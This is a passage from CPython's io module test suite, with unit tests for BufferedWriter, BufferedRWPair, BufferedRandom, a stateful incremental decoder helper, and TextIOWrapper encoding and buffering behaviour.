written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
